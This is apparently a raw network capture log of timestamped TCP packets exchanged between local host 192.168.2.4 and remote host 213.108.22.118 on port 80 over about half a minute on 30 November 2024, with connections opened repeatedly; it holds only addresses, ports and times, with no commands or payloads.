                                        Nov 30, 2024 22:38:07.976838112 CET8050059213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:07.976922035 CET5005980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:07.977102041 CET5005980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:08.097681999 CET8050059213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:08.201170921 CET5005780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:08.321208000 CET8050057213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:08.321242094 CET8050057213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:08.326200008 CET5005980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:08.446229935 CET8050059213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:08.446258068 CET8050059213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:08.446284056 CET8050059213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:09.170945883 CET8050057213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:09.283706903 CET8050059213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:09.328409910 CET5005780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:09.406430960 CET8050057213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:09.452589035 CET5005980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:09.522475004 CET8050059213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:09.622942924 CET5005780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:09.731412888 CET5005980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:09.759135008 CET5005780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:09.759288073 CET5005980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:09.759769917 CET5006280192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:09.879597902 CET8050057213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:09.879657030 CET5005780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:09.879708052 CET8050059213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:09.879722118 CET8050062213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:09.879754066 CET5005980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:09.879962921 CET5006280192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:09.879962921 CET5006280192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:09.999950886 CET8050062213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:10.232438087 CET5006280192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:10.352634907 CET8050062213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:10.352652073 CET8050062213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:10.352663994 CET8050062213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:11.244004011 CET8050062213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:11.357362032 CET5006280192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:11.487530947 CET8050062213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:11.487870932 CET5006280192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:11.608055115 CET8050062213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:11.608124971 CET5006280192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:11.608588934 CET5006880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:11.728456020 CET8050068213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:11.728538036 CET5006880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:11.728737116 CET5006880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:11.848681927 CET8050068213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:12.153301001 CET5006880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:12.273390055 CET8050068213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:12.273411036 CET8050068213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:12.273462057 CET8050068213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:13.017134905 CET8050068213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:13.060600996 CET5006880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:13.250288963 CET8050068213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:13.369461060 CET5007480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:13.369468927 CET5006880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:13.489450932 CET8050074213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:13.489537954 CET5007480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:13.489844084 CET5007480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:13.490466118 CET8050068213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:13.490596056 CET5006880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:13.610975981 CET8050074213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:13.841831923 CET5007480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:13.961779118 CET8050074213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:13.961817980 CET8050074213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:13.961906910 CET8050074213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:14.420804024 CET5007580192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:14.421186924 CET5007480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:14.540750027 CET8050075213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:14.544790983 CET5007580192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:14.547063112 CET5007580192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:14.547061920 CET5007680192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:14.581361055 CET8050074213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:14.581444979 CET5007480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:14.666990042 CET8050075213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:14.667054892 CET8050076213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:14.667150021 CET5007680192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:14.667403936 CET5007680192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:14.787326097 CET8050076213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:14.906148911 CET5007580192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:15.015568972 CET5007680192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:15.026129961 CET8050075213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:15.026247025 CET8050075213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:15.135956049 CET8050076213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:15.135997057 CET8050076213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:15.136077881 CET8050076213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:15.903831005 CET8050075213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:16.062680006 CET8050076213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:16.138600111 CET5007580192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:16.141731977 CET5007680192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:16.302418947 CET8050076213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:16.357362986 CET5007680192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:16.419404030 CET5007680192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:16.419753075 CET5008280192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:16.539809942 CET8050082213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:16.539828062 CET8050076213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:16.540082932 CET5008280192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:16.540086031 CET5007680192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:16.540277004 CET5008280192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:16.660284996 CET8050082213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:16.888825893 CET5008280192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:17.032011032 CET8050075213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:17.057704926 CET8050082213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:17.057722092 CET8050082213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:17.057734013 CET8050082213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:17.138639927 CET5007580192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:17.925108910 CET8050082213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:18.138622046 CET5008280192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:18.158618927 CET8050082213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:18.247986078 CET5008280192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:18.538125992 CET5007580192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:18.538391113 CET5008280192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:18.538959980 CET5008880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:18.658360958 CET8050075213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:18.658459902 CET5007580192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:18.658854008 CET8050082213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:18.658865929 CET8050088213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:18.658962965 CET5008280192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:18.658968925 CET5008880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:18.659163952 CET5008880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:18.779076099 CET8050088213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:19.013845921 CET5008880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:19.133840084 CET8050088213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:19.133853912 CET8050088213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:19.133873940 CET8050088213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:19.975637913 CET8050088213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:20.049531937 CET5008880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:20.210510969 CET8050088213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:20.259701014 CET5008880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:20.343590021 CET5008880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:20.344192982 CET5009480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:20.463795900 CET8050088213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:20.463848114 CET5008880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:20.464103937 CET8050094213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:20.464176893 CET5009480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:20.464447975 CET5009480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:20.584434986 CET8050094213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:20.811386108 CET5009480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:20.931432009 CET8050094213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:20.931524038 CET8050094213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:20.931534052 CET8050094213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:21.916877985 CET8050094213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:22.014987946 CET5009480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:22.046294928 CET5009480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:22.046756983 CET5009880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:22.159959078 CET8050094213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:22.160027027 CET5009480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:22.166821003 CET8050094213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:22.166893959 CET5009480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:22.167079926 CET8050098213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:22.167148113 CET5009880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:22.167916059 CET5009880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:22.173351049 CET5010080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:22.287802935 CET8050098213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:22.293344021 CET8050100213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:22.293414116 CET5010080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:22.293673038 CET5010080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:22.413559914 CET8050100213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:22.513752937 CET5009880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:22.633815050 CET8050098213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:22.633829117 CET8050098213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:22.638880014 CET5010080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:22.759165049 CET8050100213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:22.759177923 CET8050100213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:22.759187937 CET8050100213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:23.562110901 CET8050098213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:23.654314041 CET5009880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:23.752121925 CET8050100213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:23.792495966 CET5010080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:23.817183971 CET8050098213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:23.908621073 CET5009880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:23.995842934 CET8050100213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:24.060549021 CET5010080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:24.269547939 CET5009880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:24.269659042 CET5010080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:24.270183086 CET5010580192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:24.389836073 CET8050098213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:24.389906883 CET5009880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:24.390058994 CET8050105213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:24.390124083 CET5010580192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:24.390144110 CET8050100213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:24.390188932 CET5010080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:24.395206928 CET5010580192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:24.515186071 CET8050105213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:24.748203039 CET5010580192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:24.868413925 CET8050105213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:24.868438959 CET8050105213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:24.868623972 CET8050105213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:25.808310032 CET8050105213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:25.857434034 CET5010580192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:26.042562008 CET8050105213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:26.161899090 CET5010580192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:26.169754982 CET5010580192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:26.170135975 CET5010980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:26.290060997 CET8050105213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:26.290074110 CET8050109213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:26.290117025 CET5010580192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:26.290224075 CET5010980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:26.290427923 CET5010980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:26.410300970 CET8050109213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:26.638863087 CET5010980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:26.758841038 CET8050109213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:26.758858919 CET8050109213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:26.758912086 CET8050109213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:27.674778938 CET8050109213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:27.732517004 CET5010980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:27.910437107 CET8050109213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:28.030476093 CET5010980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:28.030795097 CET5011380192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:28.150717974 CET8050113213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:28.150810003 CET5011380192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:28.150825977 CET8050109213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:28.150895119 CET5010980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:28.151048899 CET5011380192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:28.270998001 CET8050113213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:28.498194933 CET5011380192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:28.619513988 CET8050113213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:28.619529963 CET8050113213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:28.619540930 CET8050113213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:28.838001966 CET5011480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:28.838279009 CET5011380192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:28.959469080 CET8050114213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:28.959594965 CET5011480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:28.961883068 CET5011480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:28.967972994 CET5011580192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:29.002749920 CET8050113213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:29.081733942 CET8050114213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:29.087977886 CET8050115213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:29.088138103 CET5011580192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:29.088288069 CET5011580192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:29.158171892 CET8050113213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:29.158356905 CET5011380192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:29.208153009 CET8050115213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:29.310678005 CET5011480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:29.430795908 CET8050114213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:29.430840015 CET8050114213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:29.435698986 CET5011580192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:29.555824995 CET8050115213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:29.555838108 CET8050115213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:29.555953979 CET8050115213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:30.403708935 CET8050114213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:30.414098978 CET8050115213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:30.532607079 CET5011580192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:30.638546944 CET8050114213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:30.638614893 CET5011480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:30.646581888 CET8050115213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:30.762476921 CET5011480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:30.762680054 CET5011580192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:30.763000965 CET5011680192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:30.882792950 CET8050114213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:30.882867098 CET5011480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:30.882915020 CET8050116213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:30.882997036 CET5011680192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:30.883181095 CET5011680192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:30.883183956 CET8050115213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:30.883302927 CET5011580192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:31.003171921 CET8050116213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:31.232891083 CET5011680192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:31.353003025 CET8050116213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:31.353039026 CET8050116213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:31.353079081 CET8050116213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:32.273438931 CET8050116213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:32.326205015 CET5011680192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:32.506448030 CET8050116213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:32.623200893 CET5011680192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:32.627784014 CET5011780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:32.747785091 CET8050117213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:32.748063087 CET5011780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:32.748279095 CET5011780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:32.868196964 CET8050117213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:33.110779047 CET5011780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:33.230851889 CET8050117213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:33.230870008 CET8050117213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:33.230881929 CET8050117213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:34.213676929 CET8050117213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:34.256814957 CET5011780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:34.459898949 CET8050117213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:34.575532913 CET5011880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:34.575536013 CET5011780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:34.695631027 CET8050118213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:34.695934057 CET8050117213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:34.696858883 CET5011880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:34.696870089 CET5011780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:34.697127104 CET5011880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:34.817524910 CET8050118213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:35.045105934 CET5011880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:35.165049076 CET8050118213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:35.165086031 CET8050118213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:35.165172100 CET8050118213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:35.655375004 CET5011880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:35.655647993 CET5011980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:35.772339106 CET5011680192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:35.775603056 CET8050119213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:35.775693893 CET5011980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:35.775911093 CET5011980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:35.782424927 CET5012080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:35.783358097 CET8050118213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:35.783415079 CET5011880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:35.896687984 CET8050119213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:35.902905941 CET8050120213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:35.902981043 CET5012080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:35.903141022 CET5012080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:36.023051023 CET8050120213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:36.123384953 CET5011980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:36.243598938 CET8050119213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:36.243618965 CET8050119213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:36.248379946 CET5012080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:36.368443966 CET8050120213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:36.368458033 CET8050120213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:36.368511915 CET8050120213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:37.096735001 CET8050119213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:37.138777018 CET5011980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:37.330565929 CET8050119213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:37.353579044 CET8050120213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:37.376781940 CET5011980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:37.560656071 CET5012080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:37.599809885 CET8050120213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:37.662638903 CET5012080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:37.718533993 CET5011980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:37.718622923 CET5012080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:37.718980074 CET5012180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:37.839292049 CET8050119213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:37.839366913 CET5011980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:37.839556932 CET8050121213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:37.839653969 CET5012180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:37.839813948 CET5012180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:37.839975119 CET8050120213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:37.840025902 CET5012080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:37.960169077 CET8050121213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:38.186100960 CET5012180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:38.306090117 CET8050121213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:38.306140900 CET8050121213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:38.306152105 CET8050121213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:39.164870024 CET8050121213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:39.216969013 CET5012180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:39.398659945 CET8050121213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:39.452780962 CET5012180192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:39.528791904 CET5012280192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:39.648765087 CET8050122213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:39.648853064 CET5012280192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:39.649108887 CET5012280192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:39.768970966 CET8050122213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:39.998255968 CET5012280192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:40.118372917 CET8050122213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:40.118401051 CET8050122213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:40.118406057 CET8050122213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:40.995573997 CET8050122213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:41.045049906 CET5012280192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:41.230694056 CET8050122213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:41.280793905 CET5012280192.168.2.4213.108.22.118
